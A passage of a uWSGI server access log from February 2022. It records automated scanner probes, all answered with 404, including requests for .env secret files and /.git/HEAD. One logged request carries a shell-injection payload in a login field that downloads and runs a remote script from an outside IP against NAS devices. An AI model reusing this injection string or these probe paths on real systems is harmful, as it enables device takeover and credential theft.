00:53:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 482/565] 47.101.191.231 () {34 vars in 460 bytes} [Sat Feb 5 01:44:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 483/566] 62.171.132.199 () {40 vars in 672 bytes} [Sat Feb 5 01:51:32 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 484/567] 45.180.220.149 () {32 vars in 465 bytes} [Sat Feb 5 02:50:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 485/568] 109.237.103.123 () {36 vars in 525 bytes} [Sat Feb 5 04:03:34 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 486/569] 83.97.20.34 () {30 vars in 328 bytes} [Sat Feb 5 04:39:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 487/570] 184.169.220.207 () {30 vars in 459 bytes} [Sat Feb 5 04:55:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 488/571] 167.248.133.117 () {34 vars in 444 bytes} [Sat Feb 5 04:59:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.119 client_port: 55290] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 489/572] 64.62.197.122 () {28 vars in 307 bytes} [Sat Feb 5 05:36:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 490/573] 62.171.132.199 () {40 vars in 672 bytes} [Sat Feb 5 05:42:49 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 491/574] 89.248.172.16 () {30 vars in 488 bytes} [Sat Feb 5 05:51:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 492/575] 89.248.172.16 () {32 vars in 471 bytes} [Sat Feb 5 05:51:04 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 55/576] 130.211.54.158 () {38 vars in 522 bytes} [Sat Feb 5 05:51:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 493/577] 136.144.41.117 () {40 vars in 568 bytes} [Sat Feb 5 05:56:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 494/578] 176.107.23.166 () {30 vars in 437 bytes} [Sat Feb 5 06:18:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 495/579] 167.94.138.44 () {28 vars in 310 bytes} [Sat Feb 5 06:30:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 496/580] 167.94.138.44 () {34 vars in 442 bytes} [Sat Feb 5 06:30:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 497/581] 45.95.169.102 () {40 vars in 567 bytes} [Sat Feb 5 06:32:55 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 498/582] 83.97.20.34 () {26 vars in 286 bytes} [Sat Feb 5 06:50:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 499/583] 88.80.186.144 () {22 vars in 234 bytes} [Sat Feb 5 07:05:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 500/584] 88.80.186.144 () {22 vars in 296 bytes} [Sat Feb 5 07:05:07 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 501/585] 88.80.186.144 () {22 vars in 238 bytes} [Sat Feb 5 07:05:08 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 502/586] 88.80.186.144 () {22 vars in 237 bytes} [Sat Feb 5 07:05:08 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 503/587] 88.80.186.144 () {40 vars in 484 bytes} [Sat Feb 5 07:05:09 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 504/588] 88.80.186.144 () {32 vars in 389 bytes} [Sat Feb 5 07:05:09 2022] GET /Portal0000.htm => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 505/589] 88.80.186.144 () {36 vars in 462 bytes} [Sat Feb 5 07:05:09 2022] POST /scripts/WPnBr.dll => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 21/590] 88.80.186.144 () {32 vars in 369 bytes} [Sat Feb 5 07:05:09 2022] GET /nCYR => generated 179 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 56/591] 88.80.186.144 () {32 vars in 391 bytes} [Sat Feb 5 07:05:09 2022] GET /CSS/Miniweb.css => generated 179 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 5/592] 88.80.186.144 () {32 vars in 409 bytes} [Sat Feb 5 07:05:09 2022] GET /nmaplowercheck1644044709 => generated 179 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 506/593] 88.80.186.144 () {24 vars in 252 bytes} [Sat Feb 5 07:05:10 2022] OPTIONS * => generated 179 bytes in 2 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19139|app: 0|req: 1/594] 88.80.186.144 () {34 vars in 397 bytes} [Sat Feb 5 07:05:09 2022] POST /sdk => generated 179 bytes in 336 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19141|app: 0|req: 1/595] 88.80.186.144 () {32 vars in 397 bytes} [Sat Feb 5 07:05:09 2022] GET /Portal/Portal.mwsl => generated 179 bytes in 372 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 507/596] 88.80.186.144 () {32 vars in 387 bytes} [Sat Feb 5 07:05:10 2022] GET /default.shtml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 508/597] 88.80.186.144 () {32 vars in 385 bytes} [Sat Feb 5 07:05:10 2022] GET /__Additional => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 509/598] 88.80.186.144 () {32 vars in 379 bytes} [Sat Feb 5 07:05:10 2022] GET /.git/HEAD => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 510/599] 88.80.186.144 () {32 vars in 403 bytes} [Sat Feb 5 07:05:10 2022] GET /pools/default/buckets => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 511/600] 88.80.186.144 () {32 vars in 442 bytes} [Sat Feb 5 07:05:10 2022] GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 512/601] 88.80.186.144 () {32 vars in 371 bytes} [Sat Feb 5 07:05:10 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 513/602] 88.80.186.144 () {32 vars in 361 bytes} [Sat Feb 5 07:05:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 514/603] 88.80.186.144 () {32 vars in 403 bytes} [Sat Feb 5 07:05:10 2022] GET /docs/cplugError.html/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 22/604] 88.80.186.144 () {32 vars in 377 bytes} [Sat Feb 5 07:05:11 2022] GET /base.jsp => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 57/605] 88.80.186.144 () {32 vars in 442 bytes} [Sat Feb 5 07:05:11 2022] GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 58/606] 88.80.186.144 () {32 vars in 371 bytes} [Sat Feb 5 07:05:11 2022] GET /pools => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 59/607] 88.80.186.144 () {32 vars in 361 bytes} [Sat Feb 5 07:05:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 60/608] 88.80.186.144 () {32 vars in 381 bytes} [Sat Feb 5 07:05:11 2022] GET /index.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 515/609] 88.80.186.144 () {32 vars in 383 bytes} [Sat Feb 5 07:05:12 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 516/610] 88.80.186.144 () {32 vars in 362 bytes} [Sat Feb 5 07:05:12 2022] HEAD / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 517/611] 88.80.186.144 () {32 vars in 379 bytes} [Sat Feb 5 07:05:12 2022] GET /index.asp => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 518/612] 88.80.186.144 () {32 vars in 375 bytes} [Sat Feb 5 07:05:12 2022] GET /menu.pl => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 519/613] 88.80.186.144 () {32 vars in 361 bytes} [Sat Feb 5 07:05:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 23/614] 88.80.186.144 () {32 vars in 377 bytes} [Sat Feb 5 07:05:13 2022] GET /menu.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 2/615] 88.80.186.144 () {32 vars in 381 bytes} [Sat Feb 5 07:05:14 2022] GET /indice.jsa => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 4/616] 88.80.186.144 () {28 vars in 389 bytes} [Sat Feb 5 07:05:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 6/617] 88.80.186.144 () {28 vars in 307 bytes} [Sat Feb 5 07:05:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 520/618] 161.97.106.237 () {40 vars in 629 bytes} [Sat Feb 5 09:15:23 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 521/619] 101.36.126.176 () {30 vars in 329 bytes} [Sat Feb 5 09:25:24 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 522/620] 192.241.208.247 () {34 vars in 395 bytes} [Sat Feb 5 09:35:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 523/621] 45.170.223.191 () {32 vars in 464 bytes} [Sat Feb 5 09:58:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 524/622] 167.99.246.82 () {34 vars in 523 bytes} [Sat Feb 5 10:42:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 525/623] 83.97.20.34 () {30 vars in 329 bytes} [Sat Feb 5 10:50:55 2022] GET / => generated 179 bytes in 32 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 526/624] 95.47.123.124 () {32 vars in 464 bytes} [Sat Feb 5 10:52:32 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 527/625] 136.144.41.117 () {40 vars in 568 bytes} [Sat Feb 5 11:08:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 528/626] 167.248.133.45 () {28 vars in 311 bytes} [Sat Feb 5 11:21:30 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19142|app: 0|req: 1/627] 167.248.133.45 () {34 vars in 443 bytes} [Sat Feb 5 11:21:30 2022] GET / => generated 179 bytes in 244 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 529/628] 161.97.106.237 () {40 vars in 629 bytes} [Sat Feb 5 11:42:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 530/629] 83.97.20.34 () {26 vars in 287 bytes} [Sat Feb 5 12:48:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 531/630] 1.13.3.249 () {22 vars in 231 bytes} [Sat Feb 5 13:00:16 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 532/631] 35.233.62.116 () {42 vars in 562 bytes} [Sat Feb 5 13:58:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 533/632] 39.99.248.30 () {34 vars in 410 bytes} [Sat Feb 5 14:03:38 2022] POST /sdk => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 61/633] 39.99.248.30 () {32 vars in 408 bytes} [Sat Feb 5 14:03:38 2022] GET /text4041644069817 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 62/634] 39.99.248.30 () {32 vars in 394 bytes} [Sat Feb 5 14:03:38 2022] GET /evox/about => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 24/635] 39.99.248.30 () {28 vars in 306 bytes} [Sat Feb 5 14:03:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 534/636] 39.99.248.30 () {32 vars in 384 bytes} [Sat Feb 5 14:03:38 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 535/637] 39.99.248.30 () {36 vars in 462 bytes} [Sat Feb 5 14:03:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 536/638] 39.99.248.30 () {34 vars in 413 bytes} [Sat Feb 5 14:03:49 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 537/639] 136.144.41.117 () {40 vars in 568 bytes} [Sat Feb 5 14:30:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 538/640] 23.90.160.114 () {34 vars in 487 bytes} [Sat Feb 5 14:44:05 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 539/641] 1.13.3.249 () {32 vars in 470 bytes} [Sat Feb 5 14:49:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 540/642] 1.13.3.249 () {32 vars in 419 bytes} [Sat Feb 5 14:49:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 541/643] 1.13.3.249 () {36 vars in 671 bytes} [Sat Feb 5 14:49:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 542/644] 1.13.189.96 () {34 vars in 367 bytes} [Sat Feb 5 15:00:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 543/645] 83.97.20.34 () {30 vars in 329 bytes} [Sat Feb 5 16:45:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.119 client_port: 55290] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 544/646] 62.171.150.168 () {28 vars in 311 bytes} [Sat Feb 5 17:24:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 545/647] 62.171.150.168 () {40 vars in 690 bytes} [Sat Feb 5 17:24:51 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 546/648] 71.6.135.131 () {30 vars in 488 bytes} [Sat Feb 5 17:34:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 25/649] 71.6.135.131 () {32 vars in 471 bytes} [Sat Feb 5 17:34:54 2022] GET /favicon.ico => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 547/650] 35.233.62.116 () {38 vars in 520 bytes} [Sat Feb 5 17:35:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 548/651] 83.97.20.34 () {26 vars in 287 bytes} [Sat Feb 5 18:30:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 549/652] 94.102.56.151 () {34 vars in 402 bytes} [Sat Feb 5 19:00:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 550/653] 209.17.96.10 () {30 vars in 409 bytes} [Sat Feb 5 19:29:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 551/654] 183.136.225.42 () {30 vars in 414 bytes} [Sat Feb 5 20:46:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 552/655] 183.136.225.42 () {32 vars in 475 bytes} [Sat Feb 5 20:47:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 553/656] 161.97.106.237 () {40 vars in 629 bytes} [Sat Feb 5 21:53:02 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 554/657] 83.97.20.34 () {30 vars in 329 bytes} [Sat Feb 5 22:22:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 555/658] 132.145.39.16 () {34 vars in 432 bytes} [Sat Feb 5 22:38:12 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 556/659] 132.145.39.16 () {34 vars in 446 bytes} [Sat Feb 5 22:38:12 2022] GET /vendor/.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 557/660] 132.145.39.16 () {34 vars in 448 bytes} [Sat Feb 5 22:38:13 2022] GET /storage/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 558/661] 132.145.39.16 () {34 vars in 446 bytes} [Sat Feb 5 22:38:13 2022] GET /public/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 559/662] 132.145.39.16 () {34 vars in 444 bytes} [Sat Feb 5 22:38:14 2022] GET /login/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 560/663] 132.145.39.16 () {34 vars in 440 bytes} [Sat Feb 5 22:38:14 2022] GET /app/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 561/664] 132.145.39.16 () {34 vars in 446 bytes} [Sat Feb 5 22:38:15 2022] GET /config/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 562/665] 132.145.39.16 () {34 vars in 424 bytes} [Sat Feb 5 22:38:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 563/666] 192.241.208.108 () {34 vars in 419 bytes} [Sat Feb 5 23:30:00 2022] GET /ReportServer => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 564/667] 83.97.20.34 () {26 vars in 286 bytes} [Sun Feb 6 00:29:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 565/668] 184.105.139.70 () {28 vars in 308 bytes} [Sun Feb 6 01:11:02 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 566/669] 222.186.59.201 () {30 vars in 477 bytes} [Sun Feb 6 01:24:40 2022] GET http://httpbin.org/ip => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19142|app: 0|req: 2/670] 222.186.59.201 () {30 vars in 468 bytes} [Sun Feb 6 01:24:40 2022] GET http://httpbin.org/ip => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 567/671] 136.144.41.117 () {40 vars in 568 bytes} [Sun Feb 6 01:41:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 568/672] 186.33.82.143 () {32 vars in 464 bytes} [Sun Feb 6 01:55:42 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 569/673] 47.101.199.29 () {34 vars in 459 bytes} [Sun Feb 6 02:30:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 570/674] 161.97.106.237 () {40 vars in 629 bytes} [Sun Feb 6 03:03:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 571/675] 35.87.25.248 () {36 vars in 522 bytes} [Sun Feb 6 03:15:53 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 572/676] 35.87.25.248 () {40 vars in 629 bytes} [Sun Feb 6 03:15:54 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 573/677] 23.251.102.74 () {34 vars in 487 bytes} [Sun Feb 6 04:18:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 574/678] 136.144.41.117 () {40 vars in 568 bytes} [Sun Feb 6 04:30:04 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 575/679] 83.97.20.34 () {30 vars in 328 bytes} [Sun Feb 6 04:32:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 576/680] 62.197.136.164 () {24 vars in 266 bytes} [Sun Feb 6 05:34:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 577/681] 62.197.136.164 () {32 vars in 742 bytes} [Sun Feb 6 05:34:47 2022] GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bcd%20/tmp;wget%20http://136.144.41.151/multi/wget.sh%20-O-%20>s;chmod%20777%20s;sh%20s%20Exploit.ZyxeNas;+%23&password=asdf => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 578/682] 83.97.20.34 () {26 vars in 285 bytes} [Sun Feb 6 06:45:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 579/683] 103.207.42.166 () {36 vars in 590 bytes} [Sun Feb 6 08:55:56 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 580/684] 103.207.42.166 () {40 vars in 697 bytes} [Sun Feb 6 08:56:03 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 581/685] 103.90.205.76 () {32 vars in 470 bytes} [Sun Feb 6 09:19:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 582/686] 154.73.197.162 () {32 vars in 465 bytes} [Sun Feb 6 09:35:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 583/687] 83.97.20.34 () {30 vars in 329 bytes} [Sun Feb 6 10:09:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 584/688] 192.241.200.131 () {34 vars in 395 bytes} [Sun Feb 6 11:27:57 